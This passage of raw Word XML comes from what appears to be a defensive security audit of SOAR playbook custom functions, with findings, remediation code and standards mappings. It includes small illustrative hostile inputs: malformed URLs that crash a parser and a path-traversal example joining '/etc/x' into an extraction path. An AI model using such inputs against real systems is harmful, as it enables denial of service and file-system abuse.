        <w:t xml:space="preserve">'s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> property raises </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ValueError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for an out-of-range or non-numeric port (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://h:99999/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://h:abc/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Since the function is fed attacker URLs and has no try/except, a crafted URL raises and fails the playbook block rather than returning parsed components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can also be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for odd inputs, which downstream code may not expect. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CEF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requestURL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a nuisance DoS of the URL-parsing block. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>parsed = urlparse(input_url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>try:</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port = parsed.port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>except ValueError:</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port = None</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>outputs = {..., 'hostname': parsed.hostname or '', 'port': port, ...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-248; CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1499 Endpoint Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-12 — debug.py and passthrough.py log full input values (sensitive data to logs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.3). Exploitability: Data-handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/debug.py:29-36; passthrough.py:41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These utilities stringify and log every input (which may be PII, email bodies, credentials pulled from other blocks, decoded base64) to the SOAR debug/playbook log, where retention and access controls differ from the vault. By design for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, but worth flagging for data-handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: truncate/redact logged values, gate on an explicit verbosity flag, and document that sensitive data should not be routed through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>passthrough</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-532 Insertion of Sensitive Information into Log File; CWE-200 Exposure of Sensitive Information to an Unauthorized Actor (2024 CWE Top 25 #17). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AU-9 Protection of Audit Information, SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.15 Logging. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-13 — Validation via assert statements (stripped under python -O)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Robustness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/*.py (40 sites, e.g. zip_extract.py:67, find_related_containers.py:299,341)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the sole JSON-serializability / type gate before returning. If the interpreter runs with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-O</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PYTHONOPTIMIZE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, all asserts are removed and the guarantee silently disappears; some asserts (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find_related_containers.py:299</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) also double as early-return control flow. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: replace with explicit runtime checks that raise, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>try: json.dumps(outputs) except (TypeError, ValueError): raise RuntimeError("outputs not JSON-serializable")</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-617; CWE-703. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-15 — Missing None/type guards and empty-cell substring logic bug (custom_list_value_in_strings)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Robustness / correctness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/string_split.py:26; regex_split.py:34-35; regex_filter_list.py:22; json_safe_format.py:17; custom_list_value_in_strings.py:27-35; list_deduplicate.py:18; list_drop_none.py:18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These are input-validation gaps. Most fail closed (raise), degrading reliability under hostile/malformed CEF data; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>custom_list_value_in_strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">'s empty-cell behaviour is a correctness bug that can mislabel benign strings as matches in a security comparison. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: add explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>isinstance</w:t>
      </w:r>
      <w:r>
        <w:t>/None checks at each entry point and skip empty cells (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if cell and comparison_string.find(cell) != -1</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-754 Improper Check for Unusual or Exceptional Conditions; CWE-476 NULL Pointer Dereference (2024 CWE Top 25 #21). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-16 — base64_decode: fail-open decoding, NUL stripping and non-ASCII drop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Integrity / evasion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/base64_decode.py:54-63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Decoded output is forced through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.decode('ascii')</w:t>
      </w:r>
      <w:r>
        <w:t>, so any binary/UTF-8 payload raises and is silently dropped (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, loop continues) — a decoded IOC can vanish without signal. NUL bytes are stripped from the result, altering the decoded content. Invalid chunks in split mode are skipped rather than reported. This is fail-open behaviour over attacker data (base64 is a common obfuscation of malicious indicators). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: decode with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>errors='replace'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or return raw bytes hex, do not strip NUL silently, and surface skipped/undecodable chunks in the output so detections are not blinded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-172; CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-703. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design, A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1027 Obfuscated Files or Information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.AE Detect - Adverse Event Analysis. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-18 — zip_extract: unvalidated vault_id used to build the temp extraction path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Defence-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/zip_extract.py:48</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vault_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comes from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*.cef.vaultId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (attacker-influenced). It is only existence-checked via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.vault_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; it is not validated as a bare hash/int before being joined into a filesystem path. If a value containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or an absolute path ever passed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vault_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> join semantics could redirect the extraction directory (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Path('/a/b') / '/etc/x'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). In practice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vault_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requires a real vault item, so this is defense-in-depth. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: validate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vault_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^[A-Fa-f0-9]{40,64}$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or integer before any path construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) (2024 CWE Top 25 #5); CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
